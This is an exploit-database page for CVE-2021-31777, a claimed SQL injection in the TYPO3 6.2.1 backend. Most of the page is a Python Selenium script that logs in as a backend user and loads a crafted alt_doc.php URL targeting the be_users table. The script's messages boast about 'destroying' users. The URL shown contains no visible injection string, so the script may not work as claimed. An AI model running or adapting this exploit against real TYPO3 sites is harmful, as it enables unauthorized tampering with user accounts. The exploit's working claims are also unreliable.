TYPO3 6.2.1 SQL Injection

2021.05.04
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.02.2021 # Vendor: https://typo3.org/ # Link: https://get.typo3.org/version/6.2.1 # CVE: CVE-2021-31777 # Proof: https://streamable.com/8v7v4i [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-31777 from selenium import webdriver import time import os, sys # Vendor: https://typo3.org/ website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php" # enter your login username username="nu11secur1ty" # enter your login password password="password" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="p_field" #enter the element for submit button element_for_submit="commandLI" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users time.sleep(3) browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit vulnerability MySQL user table by using backend.php vulnerability time.sleep(3) # Payload link browser.get((" http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#")) print("The payload is deployed it is time to destroy some user...\n") os.system('pause') browser.close() except Exception: #### This exception is if the user is not found in the database or something is wrong. print("Sorry, but this user who you searching for is destroyed by using of MySQL vulnerability in backend.php...") --------------------------------- # Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php # Date: 05.02.2021 # Exploit Authotr idea: @nu11secur1ty # Exploit Debugging: @nu11secur1ty # Vendor Homepage: https://typo3.org/ # Software Link: https://get.typo3.org/version/6.2.1 # Steps to Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top